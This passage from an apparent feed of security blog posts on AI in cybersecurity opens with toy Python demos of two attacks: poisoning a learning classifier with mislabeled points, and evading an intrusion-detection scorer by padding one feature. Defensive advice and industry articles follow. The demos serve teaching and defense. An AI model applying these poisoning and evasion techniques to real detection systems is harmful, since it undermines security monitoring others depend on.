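for p in [(1, 1), (2, 1), (1, 2)]:
    model.learn(p, "benign")
for p in [(8, 8), (9, 8), (8, 9)]:
    model.learn(p, "malicious")

probe = (6, 6)                       # a malicious-looking sample
print(model.classify(probe))         # "malicious"

# Poisoning: the attacker submits points near the malicious region
# mislabeled as "benign", dragging the benign centroid toward it.
for p in [(5, 5), (6, 6), (7, 6), (6, 7)]:
    model.learn(p, "benign")

print(model.classify(probe))         # now "benign"
```

Because the model keeps learning from incoming data, each poisoned sample nudges the decision boundary a little further in the attacker's favor.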

Evasion Attacks

In this type of attack, an attacker causes the model to misclassify a sample. Consider a simple machine learning-based intrusion detection system (IDS), as shown in the following figure. This IDS decides if a given sample is an intrusion or normal traffic based on parameters A, B and C. Weights of the parameters (depicted as adjustable via a slider button) determine whether traffic is normal or an intrusion.

Figure 3

If this is a whitebox system, an adversary could probe it to carefully determine the parameter that would classify the traffic as normal and then increase that parameter’s weight. The concept is illustrated in the following figure. The attacker recognized that parameter B plays a role in classifying an intrusion as normal and increased the weight of parameter B to achieve his or her goal.

Figure 4
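The probing step can be sketched against a hypothetical linear scorer; the feature names, weights and threshold below are illustrative, not taken from any real IDS. The attacker inspects the known weights (the whitebox assumption), finds the feature that most lowers the score, and pads the attack traffic along it until the sample is classified as normal:

```python
# Toy whitebox IDS: a linear scorer over three traffic features.
WEIGHTS = {"A": 0.8, "B": -0.9, "C": 0.5}   # B pushes toward "normal"
THRESHOLD = 2.0

def classify(sample):
    score = sum(WEIGHTS[f] * sample[f] for f in WEIGHTS)
    return "intrusion" if score >= THRESHOLD else "normal"

attack = {"A": 3.0, "B": 0.5, "C": 2.0}     # a genuine intrusion
print(classify(attack))                      # "intrusion"

# Evasion: pick the feature with the most score-lowering weight
# and inflate it until the classifier flips.
evasive_feature = min(WEIGHTS, key=WEIGHTS.get)   # -> "B"
evaded = dict(attack)
while classify(evaded) == "intrusion":
    evaded[evasive_feature] += 0.5

print(classify(evaded))                      # "normal"
```

The attack traffic itself is unchanged in intent; only the feature the model over-trusts has been padded, which is exactly the blind spot an imperfect model exposes.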

How to Defend Against Attacks on Machine Learning Systems

There are different approaches for preventing each type of attack. The following best practices can help security teams defend against poisoning attacks:

  • Ensure that you can trust any third parties or vendors involved in training your model or providing samples for training it.
  • If training is done internally, devise a mechanism for inspecting the training data for any contamination.
  • Try to avoid real-time training and instead train offline. This not only gives you the opportunity to vet the data, but also discourages attackers, since it cuts off the immediate feedback they could otherwise use to improve their attacks.
  • Keep a ground truth test and test your model against this set after every training cycle. Considerable changes in classifications from the original set will indicate poisoning.
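The ground-truth check in the last step can be sketched as a simple drift test; the samples, labels and tolerance below are illustrative:

```python
def check_ground_truth(model_predict, ground_truth, tolerance=0.02):
    """Compare the retrained model's labels on a held-out ground-truth
    set against the expected labels; large drift suggests poisoning.

    model_predict: callable mapping a sample to a label
    ground_truth:  list of (sample, expected_label) pairs
    """
    mismatches = sum(1 for sample, expected in ground_truth
                     if model_predict(sample) != expected)
    drift = mismatches / len(ground_truth)
    return drift <= tolerance, drift

# Hypothetical usage after a training cycle:
ground_truth = [((0.1, 0.2), "benign"), ((0.9, 0.8), "malicious"),
                ((0.2, 0.1), "benign"), ((0.8, 0.9), "malicious")]

healthy = lambda s: "malicious" if sum(s) > 1.0 else "benign"
poisoned = lambda s: "benign"    # a poisoned model lets attacks through

print(check_ground_truth(healthy, ground_truth))   # (True, 0.0)
print(check_ground_truth(poisoned, ground_truth))  # (False, 0.5)
```

Running this after every training cycle turns a silent boundary shift into a visible regression.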

Defending against evasion attacks is very hard because trained models are imperfect, and an attacker can always find and tune the parameters that will tilt the classifier in the desired direction. Researchers have proposed two defenses for evasion attacks:

  1. Try to train your model with all the possible adversarial examples an attacker could come up with.
  2. Compress the model so it has a very smooth decision surface, resulting in less room for an attacker to manipulate it.
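The first defense can be sketched as training-set augmentation. Note the simplification: real adversarial training perturbs samples along the model's loss gradient, whereas this illustration substitutes small random noise for brevity, and the sample data is hypothetical:

```python
import random

def augment_with_adversarial(samples, epsilon=0.1, copies=3):
    """Augment training data with small perturbations of each sample,
    keeping the original label, so the model also trains on points
    near the decision boundary. (Random noise is a weaker stand-in
    for gradient-based adversarial example generation.)"""
    augmented = list(samples)
    for features, label in samples:
        for _ in range(copies):
            noisy = tuple(x + random.uniform(-epsilon, epsilon)
                          for x in features)
            augmented.append((noisy, label))
    return augmented

train = [((0.2, 0.1), "benign"), ((0.9, 0.8), "malicious")]
print(len(augment_with_adversarial(train)))  # 2 originals + 6 copies = 8
```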

Another effective measure is to use cleverhans, a Python library that benchmarks machine learning systems’ vulnerabilities to adversarial samples. This can help organizations identify the attack surface that their machine learning models are exposing.

According to a Carbon Black report, 70 percent of security practitioners and researchers said they believe attackers are able to bypass machine learning-driven security. To make machine learning-based systems as foolproof as possible, organizations should adopt the security best practices highlighted above.

The truth is that any system can be bypassed, be it machine learning-based or traditional, if proper security measures are not implemented. Organizations have managed to keep their traditional security systems safe against most determined attackers with proper security hygiene. The same focus and concentration are required for machine learning systems. By applying that focus, you’ll be able to reap the benefits of AI and dispel any perceived mistrust toward those systems.

The post How Can Companies Defend Against Adversarial Machine Learning Attacks in the Age of AI? appeared first on Security Intelligence.

Spending on cognitive and AI systems to reach $77.6 billion in 2022

Global spending on cognitive and artificial intelligence (AI) systems is forecast to continue its trajectory of robust growth as businesses invest in projects that utilize cognitive/AI software capabilities.

Spending on the rise

According to a new update to the IDC Worldwide Semiannual Cognitive/Artificial Intelligence Systems Spending Guide, spending on cognitive and AI systems will reach $77.6 billion in 2022, more than three times the $24.0 billion forecast for 2018. The compound annual growth rate … More

The post Spending on cognitive and AI systems to reach $77.6 billion in 2022 appeared first on Help Net Security.

Better security needed to harness the positive potential of AI, mitigate risks of attacks

Despite heightened interest in enterprise deployment of artificial intelligence, only 40 percent of respondents to ISACA’s second annual Digital Transformation Barometer express confidence that their organizations can accurately assess the security of systems based on AI and machine learning. This becomes especially striking given the potential for serious consequences from maliciously trained AI; survey respondents identify social engineering, manipulated media content and data poisoning as the types of malicious AI attacks that pose the greatest … More

The post Better security needed to harness the positive potential of AI, mitigate risks of attacks appeared first on Help Net Security.

Key weapon for closing IoT-era cybersecurity gaps? Artificial intelligence

As businesses struggle to combat increasingly sophisticated cybersecurity attacks, the severity of which is exacerbated by both the vanishing IT perimeters in today’s mobile and IoT era and an acute shortage of skilled security professionals

The post Key weapon for closing IoT-era cybersecurity gaps? Artificial intelligence appeared first on The Cyber Security Place.

The Road to Freedom: How a Strong Security Culture Can Enable Digital Transformation

“The only real prison is fear, and the only real freedom is freedom from fear.” – Aung San Suu Kyi

The “new oil” — that’s how data is being referred to these days. Organizations all over the world are redefining their business models, reinventing themselves, rethinking their security culture and building around experiences. Users and their data are at the center of these experiences, so it is only natural that data breaches and security incidents have recently taken on a new dimension.

With an average cost of $3.86 million per breach and a whopping $39.49 million for megabreaches, organizations are rightfully frightened. But where fear paralyzes, prevention, timely detection and risk management can be liberating. Cybersecurity, if regarded as a strategic business enabler rather than an obstacle, can become the path to a smoother, freer digital transformation. The main challenge here lies in an organization’s ability to innovate.

Artificial Intelligence Can Help

The NHS Institute defines innovation as “doing things differently and doing different things” as a means for opening up to greater opportunities. While this mindset is critical for digital reinvention, cybersecurity can benefit from it too. Organizations have slowly yet rather successfully gone from a siloed and perimeter-based security culture to adopting integrated and intelligence-based strategies. But today’s threat and regulatory landscapes require an even higher level of cyber resiliency. Innovation is an effective path to achieving this, but an organization must be bold enough to do things differently and in a way that addresses technology, processes and people as a whole.

Applying artificial intelligence (AI) to cybersecurity is a great example of innovation. This technology is disrupting the way organizations aggregate large volumes of data, identify and contain vulnerabilities, protect against cyberattacks, and even establish digital trust.

AI allows security leaders to augment the work of analysts significantly. The Ponemon Institute’s “Artificial Intelligence in Cyber-Security” report found that out of 603 respondents, 60 percent believe that AI-based technologies can provide deeper security than a human alone could. The same 60 percent also agreed that AI increases productivity. The math on this speaks for itself. The study revealed that security teams that don’t use AI spend 400 hours per week chasing false positives. The average time using AI is only 41 hours per week. Lastly, 40 percent of respondents said that previously undetectable zero-day exploits could be detected with the help of AI.

Download the complete Ponemon Institute study: Artificial Intelligence in Cyber-Security

Cost Reduction Is Key, But Productivity Wins the Game

With AI also helping reduce identification, containment and analysis times, it makes sense that 61 percent of organizations plan to increase their investment in AI in the next year. It seems like a wise investment when you consider that an organization can reduce the average cost per record of a data breach — $148 — by $8 just by implementing AI technologies. The Ponemon report noted that with AI, a company can potentially save an average of more than $2.5 million in operating costs per year.

Most importantly, disruptive technologies such as artificial intelligence can free security teams to better focus their energy. Ponemon’s “Cost of a Data Breach” study put the mean time to identify a data breach at 197 days, with a 67-day average to contain it. Security teams spend more than half a year identifying breaches and more than 20,000 hours chasing false positives. Caught in this vortex of cybercrime and compliance, businesses are locked in a “golden cage.” A proactive strategy with an AI-involved approach leads to businesses being more aware of what happened, what can happen and, above all, what should be done.

Innovate to Improve Security Culture

Getting the security basics right, integrating artificial intelligence and aligning technology with processes for better productivity are critical cybersecurity mandates. Preparedness and accountability also play a role in mitigating risks and removing fear from the equation. But bringing innovation successfully into the organization also means changing how people think and talk about security. A lack of awareness and growing myths around security have led organizations to face an imminent challenge: the skills gap.

It is estimated that by 2020, there will be 1.5 million unfilled cybersecurity jobs. This means that students and professionals are either not engaging with security in meaningful ways or encountering entry barriers too large to surpass. At IBM, we have helped address the skills gap by innovating in several domains, including:

  • Collaborating with our customers to leverage the research and expertise of our X-Force team to train and test their security programs;

  • Engaging in design thinking practices to help organizations achieve a holistic view of cybersecurity and apply it to their operations;

  • Working with universities on their security curriculum; and

  • Embracing a new collar approach.

A security culture that permeates all areas and levels within the organization is critical to ensuring the success of an integrated and intelligent security strategy. After all, it is the people inside the organization who hold the key to any type of transformation.

Regain Your Freedom

IBM Security’s mission statement reads: “We exist to protect the world, freeing you to thrive in the face of cyber uncertainty.” Businesses exist to do business, not engage in cyber warfare. Organizations must consider approaching cybersecurity as a process, not a product. This shift in mindset and daring to innovate can enable their business to not only keep fraudsters out, but also transform freely and, ultimately, succeed.

Download the complete Ponemon Institute study: Artificial Intelligence in Cyber-Security

The post The Road to Freedom: How a Strong Security Culture Can Enable Digital Transformation appeared first on Security Intelligence.

The State of Security: The Challenges of Artificial Intelligence (AI) for Organisations

Governments, businesses and societies as a whole benefit enormously from Artificial Intelligence (AI). AI assists organisations in reducing operational costs, boosting user experience, elevating efficiency and cultivating revenue. But it also creates a number of security challenges for personal data and forms many ethical dilemmas for organisations. Such challenges for information security professionals mean re-calibration […]… Read More

The post The Challenges of Artificial Intelligence (AI) for Organisations appeared first on The State of Security.


Researchers exploring how IoT apps can imitate human decisions

CA Technologies announced its participation in scientific research to discover how Internet of Things (IoT) applications can use a type of AI known as ‘deep learning’ to imitate human decisions. The research will also explore how to prevent AI-based decisions from producing biased results. This three-year research project is named ALOHA (adaptive and secure deep learning on heterogeneous architectures). “The future of all technologies will include AI and deep learning in some way,” … More

The post Researchers exploring how IoT apps can imitate human decisions appeared first on Help Net Security.

Microsoft acquires Lobe to help bring AI development capability to everyone

Technology has already transformed the world we live in. Computers are ubiquitous, from the machines on our desks to the devices in our pockets and in our homes. Now, breakthroughs in artificial intelligence (AI) and deep learning are helping scientists treat cancer more effectively, helping farmers figure out how to grow more food using fewer natural resources, and giving people from different countries the ability to communicate across language barriers.

In many ways though, we’re only just beginning to tap into the full potential AI can provide. This in large part is because AI development and building deep learning models are slow and complex processes even for experienced data scientists and developers. To date, many people have been at a disadvantage when it comes to accessing AI, and we’re committed to changing that.

Over the last few months, we’ve made multiple investments in companies to further this goal. The acquisition of Semantic Machines in May brought in a revolutionary new approach to conversational AI,  and the acquisition of Bonsai in July will help reduce the barriers to AI development through the Bonsai team’s unique work combining machine teaching, reinforcement learning and simulation. These are just two recent examples of investments we have made to help us accelerate the current state of AI development.

Today, we’re excited to announce the acquisition of Lobe. Based in San Francisco, Lobe is working to make deep learning simple, understandable and accessible to everyone. Lobe’s simple visual interface empowers anyone to develop and apply deep learning and AI models quickly, without writing code.

We look forward to continuing the great work by Lobe in putting AI development into the hands of non-engineers and non-experts.  We’re thrilled to have Lobe join Microsoft and are excited about our future together to simplify AI development for everyone.


The post Microsoft acquires Lobe to help bring AI development capability to everyone appeared first on The Official Microsoft Blog.

It’s Time to Adopt AI in Your Security Operations Center

Security analysts: We know you’re overworked, understaffed and overwhelmed, and we understand that it’s not your fault. It’s not humanly possible for you to keep up with the ever-expanding threat landscape, especially given how busy you are with the day-to-day tasks of running your security operations center (SOC). We want you to know you’re not alone.

The Cybersecurity Skills Gap Is Only Getting Worse

According to research performed by the Enterprise Strategy Group (ESG), 51 percent of organizations in 2018 reported a “problematic shortage” of cybersecurity skills. Cybersecurity job fatigue is real, and according to ESG, 38 percent of security professionals claimed that the skills shortage has led to burnout and staff attrition. If you’re waiting for your job to magically become easier, you may want to think again; the situation is only getting worse.

Sure, the cybersecurity skills shortage and an ever-expanding threat landscape are valid excuses, but they’re not going to pay the bills when — not if — a data breach occurs. The Ponemon Institute found that the average total cost of a data breach rose from $3.62 million to $3.86 million in 2018, an increase of 6.4 percent from 2017.

Shorter Dwell Times Mean Lower Costs

According to Ponemon, organizations that identified a breach in less than 100 days saved more than $1 million as compared to those that exceeded 100 days. Similarly, organizations that contained a breach in less than 30 days saved over $1 million as compared to those that took more than 30 days to resolve.

Simple, right? Identify the breach quickly and contain it to save your organization money. However, doing this when you receive more than 1 million daily security alerts is a daunting task, even for the best analysts. For those of you who aren’t security analysts, imagine having to sort and filter through a million emails in your inbox each day to figure out which require action and which are junk.

As a result, 30 percent of respondents to an Imperva survey admitted to having ignored certain categories of alerts, while 4 percent turned off the alert notifications altogether. Additionally, 56 percent admitted to having ignored an alert based on past experiences dealing with false positives.

Why You Should Adopt AI in the Security Operations Center

So, how do you combat cybersecurity job fatigue? Your best bet is to partner with artificial intelligence (AI) to force-multiply your team’s efforts in the security operations center. Here’s how to do it:

  • Automate incident analysis. Don’t waste human capital on routine analysis. Instead, let AI automate your repetitive SOC tasks while your team focuses on mission-critical decisions, such as suspicious behavior from insider threats.
  • Augment human intelligence. Upgrade your SOC by using AI to automatically find commonalities across incidents using cognitive reasoning to provide actionable feedback with context to your analysts.
  • Respond rapidly to threats. Reduce dwell times with automated hunting for indicators and add pertinent information to act on escalations for remediation and/or blocking.

Register for the exclusive webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC,” to learn about the top five challenges plaguing today’s SOCs and how security leaders can free up their analysts by leveraging AI technologies to focus on crucial threats.

Register for the live webinar, “5 Reasons AI Is the Pillar of the Next-Gen SOC”

The post It’s Time to Adopt AI in Your Security Operations Center appeared first on Security Intelligence.

What Are the Risks and Rewards Associated With AI in Healthcare?

The emergence of artificial intelligence (AI) in healthcare is enabling organizations to improve the customer experience and protect patient data from the raging storm of cyberthreats targeting the sector. However, since the primary goal of the healthcare industry is to treat ailing patients and address their medical concerns, cybersecurity is too often treated as an afterthought.

A recent study from West Monroe Partners found that 58 percent of parties that purchased a healthcare company discovered a cybersecurity problem after the deal was done. This may be due to a lack of personnel with in-depth knowledge of security issues. As AI emerges in the sector, healthcare professionals who misuse these technologies risk unintentionally exposing patient data and subjecting their organizations to hefty fines.

What’s Driving the AI Arms Race in Healthcare?

According to Wael Abdel Aal, CEO of telemedicine provider Tele-Med International, healthcare organizations should take advantage of AI to address two critical cybersecurity issues: greater visibility and improved implementation. Abdel Aal’s background includes 21 years as a leading cardiologist, which enables him to understand AI’s impact on healthcare from a provider’s perspective.

“Although AI security systems perform sophisticated protection algorithms, better AI systems are being developed to perform more sophisticated hacks,” he said. “The computer security environment is in a continuous race between offense and defense.”

According to Abdel Aal, the ongoing transformation in the healthcare industry depends not only on AI, but also other game-changing technologies, such as electronic medical records (EMR), online portals, wearable sensors, apps, the Internet of Things (IoT), smartphones, and augmented reality (AR) and virtual reality (VR).

“The combination of these technologies will bring us closer to modern healthcare,” he said. Abdel Aal went on to reference several potential points at which a cybersecurity breach can occur, including remote access to wearables and apps owned by the patient, connectivity with telecom, health provider access, and AI hosting.

“The potential value that these technologies will bring to healthcare is at balance with the potential security hazard it presents to individuals and societies,” Abdel Aal explained. “The laws need continuous and fast updating to keep up with AI and the evolving legal questions of privacy, liability and regulation.”

As innovative technologies proliferate within healthcare systems, cyberattacks and cybercrime targeting healthcare providers are correlatively on the rise. In May 2017, for example, notorious ransomware WannaCry infected more than 200,000 victims in 150 countries. In January 2018, a healthcare organization based in Indiana was forced to pay $55,000 to cybercriminals to unlock 1,400 files of patient data, as reported by ZDNet.

In these cases, it was faster and more cost-effective for the hospital to pay the (relatively) small ransom than it would have been to undergo a complex procedure to restore the files. Unfortunately, paying the ransom only encourages threat actors. Ransomware is just the beginning; as malicious AI advances, attacks will only become more devastating.

Why Mutual Education Is Critical to Secure AI in Healthcare

So how can security leaders educate physicians and other healthcare employees to handle these new tools properly and avoid compromising patients’ privacy? Abdel Aal believes the answer is bidirectional education.

“Security leaders need to understand and experience the operational daily workflow protocols performed by individual healthcare providers,” he said. “Accordingly, they need to educate personnel and identify the most vulnerable entry points for threats and secure them.”

While the utilization of AI in healthcare is indeed on the rise and is dramatically changing the industry, according to Abdel Aal, the technology driving it hasn’t evolved as fast as it could. One of the most significant hurdles for the industry to overcome is employees’ overall aversion to new technology.

“Adoption of new technology was and always is a major deterrent, be that CT, MRI or, presently, AI,” he said. “Providers, whether doctors, nurses, technicians and others, usually see new technology as a threat to their job market. They identify with the benefits but would rather stay within their comfort zone.”

Abdel Aal also pointed to legal and regulatory factors as stumbling blocks that might prompt confusion about managing progress.

Thankfully, the American Medical Association (AMA) is prepared to address these changes. According to its recently approved AI policy statement, the association will support the development of healthcare AI solutions that safeguard patient privacy rights and preserve the security and integrity of personal information. The policy states that, among other things, the AMA will actively promote engagement with AI healthcare analytics while exploring their expanding possibilities and educating patients and healthcare providers.

Patient wellness will always be the first priority in healthcare, and this is not lost on threat actors. Just like any other industry, it is increasingly imperative for leaders to understand the progressive intertwining of their primary goals with cybersecurity practices and respond accordingly.

The post What Are the Risks and Rewards Associated With AI in Healthcare? appeared first on Security Intelligence.

Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners

Law firms tasked with analyzing mounds of data and interpreting dense legal texts can vastly improve their efficiency by training artificial intelligence (AI) tools to complete this processing for them. While AI is making headlines in a wide range of industries, legal AI may not come to mind for many. But the technology, which is already prevalent in the manufacturing, cybersecurity, retail and healthcare sectors, is quickly becoming a must-have tool in the legal industry.

Due to the sheer volume of sensitive data belonging to both clients and firms themselves, legal organizations are in a prickly position when it comes to their responsibility to uphold data privacy. Legal professionals are still learning what the privacy threats are and how they intersect with data security regulations. For this reason, it’s critical to understand security best practices for operations involving AI.

Before tackling the cybersecurity implications, let’s explore some reasons why the legal industry is such a compelling use case for AI.

How Do Legal Organizations Use AI?

If you run a law firm, imagine how much more efficient you could be if you could train your software to recognize and predict patterns that not only improve client engagement, but also streamline the workflow of your legal team. Or what if that software could learn to delegate tasks to itself?

With some AI applications already on the market, this is only the beginning of what the technology can do. For example, contract analysis automation solutions can read contracts in seconds, highlight key information visually with easy-to-read graphs and charts, and get “smarter” with each contract reviewed. Other tools use AI to scan legal documents, case files and decisions to predict how courts will rule in tax decisions.

In fact, the use of AI in the legal industry has been around for years, according to Sherry Askin, CEO of Omni Software Systems. Askin has deep roots in the AI field, including work with IBM’s Watson.

“AI is all about increasing efficiency, and is being touted as the next revolution,” she said. “We’ve squeezed as much as we can from human productivity through automation. The next plateau from productivity and the next threshold is AI.”

Why Machine Learning Is Critical

Law is all about words and natural language, the coded version of unstructured information, said Askin. While we know how to handle the coded versions, she explained, the challenge with legal AI is that outputs are tightly tailored to the past results described by their inputs. That’s where machine learning comes in to predict how these inputs might change.

Askin compared machine learning to the process of intellectual development by which children soak up new words, paragraphs, long arguments, vocabulary and, most importantly, context. With deep learning, not only are you inputting data, but you’re giving the machine context and relevance.

“The machine is no longer a vessel of information,” Askin explained. “It figures out what to do with that information and it can predict things for you.”

Although machines can’t make decisions the same way that humans can, the more neural processing and training they conduct, the more sophisticated their learning and deliverables become. Some legal AI tools can process and analyze thousands of lease agreements, doing in seconds what humans would do in weeks.

How Do Privacy Regulations Impact Legal Firms?

For any industry, protecting privileged client data is a paramount concern. The American Bar Association, which requires practitioners to employ reasonable efforts to prevent unauthorized access to client data, has implemented periodic changes and updates to address the advances of technology. In addition, the Legal Cloud Computing Association (LCCA) issued 21 standards to assist law firms and attorneys in addressing these needs, including testing, limitations on third-party access, data retention policy, encryption, end user authentication and modifications to data.

Askin urged legal organizations to evaluate strategies impacting security and privacy in the context of what they modify or replace.

“I believe this is a major factor in legal because the profession has a deep legacy of expert-led art,” she said. “Traditional IT automation solutions perform best with systematized process and structured data. Unfortunately, systematization and structure are not historically compatible with the practice of law or any other professional disciplines that rely on human intelligence and dynamic reasoning.”

How to Keep Legal AI Tools in the Right Hands

Legal organizations are tempting targets for malicious actors because they handle troves of sensitive and confidential information. Rod Soto, director of security research for Jask, recommended several key strategies: employ defense in depth principles at the infrastructure level, train personnel in security awareness and use AI to significantly enhance security posture overall. To protect automated operations conducted by AI, Soto warned, we must understand that while these AI systems are trained to be effective, they can also be steered off course.

“Malicious actors can and will approach AI learning models and will attempt to mistrain them, hence the importance of feedback loops and sanity checks from experienced analysts,” he said. “You cannot trust AI blindly.”

Finally, it’s crucial for legal organizations to understand that AI does not replace a trained analyst.

“AI is there to help the analyst in things that humans have limitations, such as processing very large amounts of alarms or going through thousands of events in a timely manner,” said Soto. “Ultimately, it is upon the trained analyst to make the call. An analyst should always exercise judgment based on his experience when using AI systems.”

Because the pressure to transform is industrywide, profound changes are taking shape to help security experts consistently identify the weakest link in the security chain: people.

“It’s nearly impossible to control all data and privacy risks where decentralized data and human-managed processes are prevalent,” Askin said. “The greater the number of endpoints, the higher the risk of breach. This is where the nature of AI can precipitate a reduction in security and privacy vulnerabilities, particularly where prior IT adoption or data protection practices were limited.”

The post Legal AI: How Machine Learning Is Aiding — and Concerning — Law Practitioners appeared first on Security Intelligence.

Stop Impersonations of Your CEO by Checking the Writing Style

If one of your employees receives an email that looks like it’s from the CEO asking them to send sensitive data or make a wire transfer, could that employee spot it as a fake based on how it is written? He or she may be so concerned with pleasing the CEO that they respond urgently without a second thought. What if artificial intelligence could recognize that the writing style of a suspect email doesn’t match the style of your CEO and spot the fraud? It can.

Writing Style DNA technology is now available to prevent Business Email Compromise (BEC) attacks, which according to the FBI have cost organizations $12.5 billion, with some companies losing as much as $56 million.


Unique Writing Style

Some of us write long sentences with a variety of words, while others are more direct, using short words and small paragraphs. If we look at the email of three Enron executives (based on a dataset of 500,000 emails released publicly during the Federal Energy Regulatory Commission’s investigation), we can see the differences in how they write. Looking at the emails of Jeffrey Skilling, Sally Beck, and David Delainey, we can compare writing style elements such as sentence length, word length, repeated words, paragraph length, pronoun usage, and adjective usage.

Graph of writing style elements of 3 Enron executives

We see that the three executives’ styles vary across the 16 elements in the chart above. As humans, we can perhaps come up with 50 or maybe 100 different writing style elements to measure. A computer AI, though, can see many more differences between users’ writing. The AI powering Writing Style DNA can examine an email for 7,000 writing style elements in less than a quarter of a second.
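Elements like these can be approximated in a few lines of code. The following is a toy sketch for illustration only; the feature choices and sample texts are invented here and bear no relation to the roughly 7,000 elements the actual engine measures:

```python
import re

def style_features(text):
    """Compute a handful of simple stylometric features from an email body."""
    words = re.findall(r"[A-Za-z']+", text)
    sentences = [s for s in re.split(r"[.!?]+", text) if s.strip()]
    pronouns = {"i", "you", "he", "she", "we", "they", "it"}
    return {
        "avg_sentence_len": len(words) / max(len(sentences), 1),
        "avg_word_len": sum(len(w) for w in words) / max(len(words), 1),
        "repeated_word_ratio": 1 - len({w.lower() for w in words}) / max(len(words), 1),
        "pronoun_ratio": sum(w.lower() in pronouns for w in words) / max(len(words), 1),
    }

# Two invented "executives" with different styles yield different feature vectors.
terse = style_features("Send it now. Call me.")
verbose = style_features("I would appreciate it if you could review the attached agreement at your earliest convenience.")
```

Comparing the two dictionaries shows the terse writer scoring lower on sentence and word length, which is the kind of per-author fingerprint a style model learns.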

If we know what an executive’s writing style looks like, then the AI can compare the expected style to the writing in an email suspected of impersonating that executive. 

Training an AI model of a User’s Writing Style

Based on previous Business Email Compromise attacks, we see that the CEO and Director are the most likely to be impersonated, and these individuals can be defined as “high-profile users” within the admin console for Trend Micro Cloud App Security or ScanMail for Exchange.


Titles of impersonated senders in 1H 2018 Business Email Compromise attempts 

To create a well-defined model of a high-profile user’s writing style, the AI examines 300-500 previously sent emails. Executives’ email is highly sensitive, so to protect privacy, the AI extracts metadata describing the writing style rather than the actual text.

Your executives’ style of writing isn’t static; it evolves over time, just as this infographic shows J.K. Rowling’s style changing over the course of the Harry Potter books. As such, the AI model for a high-profile user can be updated regularly at a selected interval.

Process Flow

When an external email arrives from a name similar to a high-profile user’s, the writing style of the email content is examined after other anti-fraud checks. The volume of BEC attacks is small to start with (compared to other types of phishing), and other AI-based technologies catch most attacks, leaving only a small number of the stealthiest for writing style examination. For these, if the style doesn’t match, the recipient is warned not to act on the email unless he or she verifies the sender’s identity using a phone number or email address from the company directory. Optionally, the impersonated executive can also be warned of the fraud attempt made in their name.
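That process flow can be sketched in plain Python. Every function, threshold, and the stand-in "style model" below are hypothetical placeholders for illustration, not Trend Micro's actual checks:

```python
from difflib import SequenceMatcher

def similar(a, b, threshold=0.8):
    """Crude sender-name similarity check (placeholder heuristic)."""
    return SequenceMatcher(None, a.lower(), b.lower()).ratio() >= threshold

class StyleModel:
    """Stand-in for a trained writing-style model (hypothetical API)."""
    def __init__(self, expected_words):
        self.expected = set(expected_words)
    def matches(self, body):
        words = set(body.lower().split())
        return len(words & self.expected) / max(len(words), 1) > 0.5

def handle_external_email(sender_name, body, high_profile_users, style_model):
    """Sketch of the process flow for an incoming external email."""
    if not any(similar(sender_name, u) for u in high_profile_users):
        return "deliver"        # sender name doesn't resemble a protected user
    # ...other anti-fraud checks would run here first (omitted)...
    if style_model.matches(body):
        return "deliver"        # writing style consistent with the executive
    return "warn_recipient"     # advise verifying the sender via the directory
```

Only mail whose sender name resembles a protected user ever reaches the (comparatively expensive) style check, mirroring the funnel described above.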

Internal and Beta Results

Internally, Trend Micro has been testing this since January of 2018. Writing style models are in place for our executive team and some other high-profile users. During this time, Writing Style DNA detected 15 additional BEC attacks which were attempting to impersonate our CEO, Eva Chen. This works out to an average of 1 additional attack detected every other week. To date, there have been no false positives.

Sample BEC attempt detected with Writing Style DNA

We have also had more than 60 beta customers try the technology over the past few months. Many initially found their executives were occasionally using personal email accounts to email others at the organization; these personal accounts can be whitelisted by the admin. Writing Style DNA detected 15 additional BEC attacks at 7 organizations.

Available now and included with your license

Writing Style DNA is now available with Cloud App Security for Office 365 and ScanMail for Microsoft Exchange at no additional charge.

The Cloud App Security service has already been updated to include this functionality, and ScanMail customers can upgrade to SMEX 12.5 SP1 to start using this technology. ScanMail customers can learn more about upgrading to v12.5 SP1 at this webinar on September 6.

The post Stop Impersonations of Your CEO by Checking the Writing Style appeared first on .

Protecting the protector: Hardening machine learning defenses against adversarial attacks

Harnessing the power of machine learning and artificial intelligence has enabled Windows Defender Advanced Threat Protection (Windows Defender ATP) next-generation protection to stop new malware attacks before they can get started, often within milliseconds. These predictive technologies are central to scaling protection and delivering effective threat prevention in the face of unrelenting attacker activity.

Consider this: on a recent typical day, 2.6 million people encountered newly discovered malware in 232 different countries (Figure 1). These attacks comprised 1.7 million distinct, first-seen malware files, and 60% of these campaigns were finished within the hour.

Figure 1. A single day of malware attacks: 2.6M people from 232 countries encountering malware

While intelligent, cloud-based approaches represent a sea change in the fight against malware, attackers are not sitting idly by and letting advanced ML and AI systems eat their Bitcoin-funded lunch. If they can find a way to defeat machine learning models at the heart of next-gen AV solutions, even for a moment, they’ll gain the breathing room to launch a successful campaign.

Today at Black Hat USA 2018, in our talk Protecting the Protector: Hardening Machine Learning Defenses Against Adversarial Attacks [PDF], we presented a series of lessons learned from our experience investigating attackers attempting to defeat our ML and AI protections. We share these lessons in this blog post; we use a case study to demonstrate how these same lessons have hardened Microsoft’s defensive solutions in the real world. We hope these lessons will help provide defensive strategies on deploying ML in the fight against emerging threats.

Lesson: Use a multi-layered approach

In our layered ML approach, defeating one layer does not mean evading detection, as there are still opportunities to detect the attack at the next layer, albeit with an increase in time to detect. To prevent detection of first-seen malware, an attacker would need to find a way to defeat each of the first three layers in our ML-based protection stack.

Figure 2. Layered ML protection

Even if the first three layers were circumvented, leading to patient zero being infected by the malware, the next layers can still uncover the threat and start protecting other users as soon as these layers reach a malware verdict.
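A layered verdict flow of this kind can be sketched as follows. The layer names and thresholds below are invented placeholders for illustration and do not describe the actual Windows Defender ATP stack:

```python
def classify(features, layers):
    """Evaluate protection layers in order; the first layer to reach a
    verdict wins. Defeating one layer only pushes detection to the next
    (slower) layer rather than evading it entirely."""
    for layer in layers:
        verdict = layer(features)
        if verdict is not None:
            return verdict
    return "unknown"

# Invented layers, fastest first; all thresholds are placeholders.
layers = [
    lambda f: "malware" if f.get("client_score", 0) > 0.9 else None,
    lambda f: "malware" if f.get("metadata_score", 0) > 0.8 else None,
    lambda f: "malware" if f.get("sample_score", 0) > 0.7 else None,
    lambda f: "malware" if f.get("detonation_score", 0) > 0.6 else None,
]
```

A sample that slips past the fast client model can still be caught by a deeper layer, at the cost of a longer time to detect.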

Lesson: Leverage the power of the cloud

ML models trained on the backend and shipped to the client are the first (and fastest) layer in our ML-based stack. They come with some drawbacks, not least of which is that an attacker can take the model and apply pressure until it gives up its secrets. This is a very old trick in the malware author’s playbook: iteratively tweak a prospective threat and keep scanning it until it’s no longer detected, then unleash it.

